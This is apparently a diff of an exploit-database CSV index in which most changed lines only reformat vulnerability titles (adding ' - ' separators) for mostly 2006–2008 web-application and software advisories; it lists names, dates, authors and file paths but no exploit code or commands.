27140,platforms/multiple/dos/27140.txt,"Exiv2 - Corrupted EXIF Data Denial of Service",2006-01-26,"Maciek Wierciski",multiple,dos,0 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 Login.ASP SQL Injection",2006-01-19,code.shell,asp,webapps,0 -27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 Forum.ASP Multiple SQL Injection",2005-12-15,"Tran Viet Phuong",asp,webapps,0 +27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - Forum.ASP Multiple SQL Injection",2005-12-15,"Tran Viet Phuong",asp,webapps,0 27144,platforms/linux/dos/27144.py,"Communigate Pro 5.0.6 Server LDAP Denial of Service",2006-01-28,"Evgeny Legerov",linux,dos,0 27145,platforms/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x Inline XML File Attachment Buffer Overflow",2006-01-28,"Mike Davis",linux,dos,0 27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - Modules.php Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 @@ -24290,7 +24290,7 @@ id,file,description,date,author,platform,type,port 27165,platforms/php/webapps/27165.txt,"Beehive Forum 0.6.2 Index.php SQL Injection",2005-12-22,trueend5,php,webapps,0 27166,platforms/php/webapps/27166.txt,"EyeOS 0.8.x Session Remote Command Execution",2006-02-07,"James Bercegay",php,webapps,0 27167,platforms/php/webapps/27167.txt,"MyBB 1.0.3 Moderation.php SQL Injection",2006-02-07,imei,php,webapps,0 -27168,platforms/qnx/local/27168.txt,"QNX 6.2/6.3 - Multiple Local Privilege Escalation and Denial of Service Vulnerabilities",2006-02-07,anonymous,qnx,local,0 +27168,platforms/qnx/local/27168.txt,"QNX 6.2/6.3 - Multiple Local Privilege Escalation / Denial of Service Vulnerabilities",2006-02-07,anonymous,qnx,local,0 27169,platforms/asp/webapps/27169.txt,"Webeveyn Whomp! Real Estate Manager 2005 Login SQL Injection",2006-02-08,night_warrior771,asp,webapps,0 27170,platforms/php/webapps/27170.txt,"vwdev Index.php SQL Injection",2006-02-08,"Omid Aghababaei",php,webapps,0 27171,platforms/multiple/dos/27171.txt,"Sun ONE Directory Server 5.2 - Remote Denial of Service",2006-02-08,"Evgeny Legerov",multiple,dos,0 @@ -24657,7 +24657,7 @@ id,file,description,date,author,platform,type,port 27558,platforms/jsp/webapps/27558.txt,"Bugzero 4.3.1 query.jsp msg Parameter XSS",2006-04-03,r0t,jsp,webapps,0 27559,platforms/jsp/webapps/27559.txt,"Bugzero 4.3.1 edit.jsp Multiple Parameter XSS",2006-04-03,r0t,jsp,webapps,0 27560,platforms/php/webapps/27560.txt,"aWebNews 1.2 - visview.php _GET['cid'] Parameter SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps,0 -27561,platforms/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x index.cgi Multiple Parameter XSS",2006-04-03,r0t,cgi,webapps,0 +27561,platforms/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x - index.cgi Multiple Parameter XSS",2006-04-03,r0t,cgi,webapps,0 27562,platforms/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x mods/calendar/index.cgi vsSD Parameter XSS",2006-04-03,r0t,cgi,webapps,0 27563,platforms/php/webapps/27563.txt,"LucidCMS 2.0 Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",php,webapps,0 27564,platforms/php/remote/27564.txt,"PHP 4.x/5.0/5.1 PHPInfo Large Input Cross-Site Scripting",2006-04-03,"Maksymilian Arciemowicz",php,remote,0 @@ -24779,12 +24779,12 @@ id,file,description,date,author,platform,type,port 27683,platforms/cgi/webapps/27683.txt,"CommuniMail 1.2 templates.cgi form_id Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps,0 27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 addlink_lwp.cgi url Parameter XSS",2006-04-19,r0t,cgi,webapps,0 -27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 edit.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 +27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - edit.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 Showtopic.php SQL Injection",2006-04-19,Qex,php,webapps,0 27688,platforms/php/webapps/27688.txt,"ContentBoxx Login.php Cross-Site Scripting",2006-04-19,botan,php,webapps,0 27689,platforms/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 -27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 index.cgi Multiple Parameter SQL Injection",2006-04-19,r0t,cgi,webapps,0 -27691,platforms/cgi/webapps/27691.txt,"xFlow 5.46.11 index.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 +27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 - index.cgi Multiple Parameter SQL Injection",2006-04-19,r0t,cgi,webapps,0 +27691,platforms/cgi/webapps/27691.txt,"xFlow 5.46.11 - index.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27692,platforms/php/webapps/27692.txt,"Plexum PlexCart X5 - Multiple SQL Injection",2006-04-19,r0t,php,webapps,0 27693,platforms/php/webapps/27693.txt,"otalCalendar - about.php inc_dir Parameter Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x AWstats.PL Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 @@ -24897,7 +24897,7 @@ id,file,description,date,author,platform,type,port 27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 POS Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 Login.php Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps,0 27795,platforms/php/webapps/27795.txt,"zenphoto 0.9/1.0 i.php a Parameter XSS",2006-05-02,zone14,php,webapps,0 -27796,platforms/php/webapps/27796.txt,"zenphoto 0.9/1.0 index.php Multiple Parameter XSS",2006-05-02,zone14,php,webapps,0 +27796,platforms/php/webapps/27796.txt,"zenphoto 0.9/1.0 - index.php Multiple Parameter XSS",2006-05-02,zone14,php,webapps,0 27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 Stats.php Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 Viewcat.php Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 @@ -25235,7 +25235,7 @@ id,file,description,date,author,platform,type,port 28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 stylesheet.php mosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0 -28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x create_course.php Multiple Parameter XSS",2006-07-06,"Security News",php,webapps,0 +28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - create_course.php Multiple Parameter XSS",2006-07-06,"Security News",php,webapps,0 28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x documentation/admin/index.php XSS",2006-07-06,"Security News",php,webapps,0 28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x password_reminder.php forgot Parameter XSS",2006-07-06,"Security News",php,webapps,0 28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x users/browse.php cat Parameter XSS",2006-07-06,"Security News",php,webapps,0 @@ -25438,7 +25438,7 @@ id,file,description,date,author,platform,type,port 28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 Edit.php - Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",linux,dos,0 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 -28385,platforms/asp/webapps/28385.txt,"BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 +28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat 2.0.6 - Remote Denial of Service",2006-08-13,"Yan Rong Ge",linux,dos,0 28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service",2006-08-15,nop,windows,dos,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 @@ -25475,7 +25475,7 @@ id,file,description,date,author,platform,type,port 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.php Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps,0 -28424,platforms/linux/remote/28424.txt,"Apache HTTP Server 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 +28424,platforms/linux/remote/28424.txt,"Apache HTTP Server 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 @@ -25713,7 +25713,7 @@ id,file,description,date,author,platform,type,port 28662,platforms/php/webapps/28662.txt,"PhotoStore details.php - gid Parameter XSS",2006-09-25,meto5757,php,webapps,0 28663,platforms/php/webapps/28663.txt,"PhotoStore view_photog.php - photogid Parameter XSS",2006-09-25,meto5757,php,webapps,0 28664,platforms/php/webapps/28664.txt,"Opial AV Download Management 1.0 Index.php Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 -28665,platforms/php/webapps/28665.txt,"WWWThreads 5.4 Cat Parameter Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps,0 +28665,platforms/php/webapps/28665.txt,"WWWThreads 5.4 - Cat Parameter Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps,0 28666,platforms/multiple/dos/28666.txt,"Call of Duty Server 4.1.x Callvote Map Command Remote Buffer Overflow",2006-09-25,"Luigi Auriemma",multiple,dos,0 28667,platforms/php/webapps/28667.txt,"BirdBlog 1.x comment.php entryid Parameter XSS",2006-09-25,Root3r_H3ll,php,webapps,0 28668,platforms/php/webapps/28668.txt,"BirdBlog 1.x index.php page Parameter XSS",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -25802,7 +25802,7 @@ id,file,description,date,author,platform,type,port 28764,platforms/windows/local/28764.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (2)",2006-08-26,"Ruben Santamarta ",windows,local,0 28765,platforms/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,windows,remote,0 28766,platforms/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,windows,remote,0 -28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 Login.php Multiple SQL Injection",2006-10-06,"Francesco Laurita",php,webapps,0 +28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - Login.php Multiple SQL Injection",2006-10-06,"Francesco Laurita",php,webapps,0 28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 Uyegiris.ASP SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0 28769,platforms/php/webapps/28769.txt,"Interspire FastFind Index.php Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module SQL Injection",2006-10-08,disfigure,php,webapps,0 @@ -25935,11 +25935,11 @@ id,file,description,date,author,platform,type,port 28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.php SQL Injection",2006-11-02,Spiked,php,webapps,0 28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.php Remote File Inclusion",2006-11-07,navairum,php,webapps,0 -28900,platforms/php/webapps/28900.txt,"ac4p Mobile index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 -28901,platforms/php/webapps/28901.txt,"ac4p Mobile MobileNews.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 +28900,platforms/php/webapps/28900.txt,"ac4p Mobile - index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 +28901,platforms/php/webapps/28901.txt,"ac4p Mobile - MobileNews.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28902,platforms/php/webapps/28902.txt,"ac4p Mobile - polls.php Multiple Parameter XSS (1)",2006-11-03,AL-garnei,php,webapps,0 28903,platforms/php/webapps/28903.txt,"ac4p Mobile send.php cats Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 -28904,platforms/php/webapps/28904.txt,"ac4p Mobile up.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 +28904,platforms/php/webapps/28904.txt,"ac4p Mobile - up.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28905,platforms/php/webapps/28905.txt,"ac4p Mobile cp/index.php pagenav Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 BlogID Parameter - Multiple SQL Injection",2006-11-03,"Benjamin Moss",php,webapps,0 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 Archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 @@ -26381,10 +26381,10 @@ id,file,description,date,author,platform,type,port 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0 29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0 29374,platforms/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - IPHLPAPI.DLL Local Privilege Escalation",2007-01-01,"Matousec Transparent security",windows,local,0 -29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 ashop/catalogue.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 +29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 ashop/basket.php cat Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 ashop/search.php searchstring Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 -29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 shipping.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 +29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - shipping.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 admin/editcatalogue.php cat Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 admin/salesadmin.php resultpage Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29383,platforms/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin Open Parameters Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote,0 @@ -26500,7 +26500,7 @@ id,file,description,date,author,platform,type,port 29502,platforms/multiple/dos/29502.html,"Transmit 3.5.5 - Remote Heap Overflow",2007-01-20,LMH,multiple,dos,0 29503,platforms/windows/dos/29503.py,"KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 Request Remote Denial of Service",2007-01-22,shinnai,windows,dos,0 29504,platforms/php/webapps/29504.txt,"Unique Ads Banner.php SQL Injection",2007-01-22,Linux_Drox,php,webapps,0 -29505,platforms/php/webapps/29505.txt,"212cafeBoard Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0 +29505,platforms/php/webapps/29505.txt,"212cafeBoard - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0 29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 Show.php Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0 @@ -26612,7 +26612,7 @@ id,file,description,date,author,platform,type,port 29565,platforms/php/webapps/29565.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0 -29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Inclusion",2007-02-05,anonymous,php,webapps,0 +29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion",2007-02-05,anonymous,php,webapps,0 29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.php3 - Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 @@ -26874,7 +26874,7 @@ id,file,description,date,author,platform,type,port 30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0 30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery Download_Script.ASP Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps,0 30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service",2007-06-06,"Dennis Rand",windows,dos,0 -30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 +30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9 - AtomPhotoBlog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow",2007-06-08,"Dennis Rand",multiple,dos,0 30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - Tk Parameter Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote,0 @@ -26962,7 +26962,7 @@ id,file,description,date,author,platform,type,port 29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 Actionpoll.php Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 Settings.php Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0 29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 Showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 -29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass and Multiple SQL Injection",2007-04-17,Aleksandar,php,webapps,0 +29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection",2007-04-17,Aleksandar,php,webapps,0 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection",2007-04-18,"John Martinelli",php,webapps,0 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 @@ -27103,7 +27103,7 @@ id,file,description,date,author,platform,type,port 30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 (profile.php password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 -30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 +30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 HLStats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 30065,platforms/php/webapps/30065.html,"GaliX 2.0 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injection",2007-05-21,"Jesper Jurcenoks",php,webapps,0 @@ -27430,7 +27430,7 @@ id,file,description,date,author,platform,type,port 30536,platforms/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning (2)",2007-08-27,"Amit Klein",linux,remote,0 30537,platforms/windows/remote/30537.txt,"Microsoft MSN Messenger 8.0 - Video Conversation Buffer Overflow",2007-08-28,wushi,windows,remote,0 30538,platforms/hardware/dos/30538.pl,"Thomson SpeedTouch 2030 SIP Empty Message Remote Denial of Service",2007-08-28,"Humberto J. Abdelnur",hardware,dos,0 -30539,platforms/php/webapps/30539.txt,"ACG News 1.0 index.php Multiple SQL Injection",2007-08-28,SmOk3,php,webapps,0 +30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - index.php Multiple SQL Injection",2007-08-28,SmOk3,php,webapps,0 30540,platforms/multiple/dos/30540.txt,"Blizzard Entertainment StarCraft Brood War 1.15.1 - Minimap Preview Remote Denial of Service",2007-08-28,"Gynvael Coldwind",multiple,dos,0 30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 30542,platforms/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 Uninitialized Pointer",2007-08-29,"Joxean Koret",linux,dos,0 @@ -27509,9 +27509,9 @@ id,file,description,date,author,platform,type,port 32395,platforms/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 Database Disclosure",2008-09-19,r45c4l,php,webapps,0 32394,platforms/asp/webapps/32394.txt,"Sama Educational Management System 'Error.asp' Cross-Site Scripting",2008-09-18,Lagon666,asp,webapps,0 32393,platforms/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution",2008-09-17,"Eli the Bearded",solaris,remote,0 -32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass and SQL Injection",2008-09-17,JosS,php,webapps,0 +32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,php,webapps,0 32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 -33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,Metasploit,php,remote,443 +33141,platforms/php/remote/33141.rb,"AlienVault OSSIM - SQL Injection / Remote Code Execution",2014-05-02,Metasploit,php,remote,443 32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps,0 @@ -27786,7 +27786,7 @@ id,file,description,date,author,platform,type,port 30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 usergallery.php galleryID Parameter XSS",2007-12-10,Brainhead,php,webapps,0 30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 calendar.php Multiple Parameter XSS",2007-12-10,Brainhead,php,webapps,0 30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0 -30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0 +30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0 30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 @@ -27799,7 +27799,7 @@ id,file,description,date,author,platform,type,port 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 -30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 +30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0 30895,platforms/linux/dos/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service",2007-12-17,beSTORM,linux,dos,0 @@ -27920,7 +27920,7 @@ id,file,description,date,author,platform,type,port 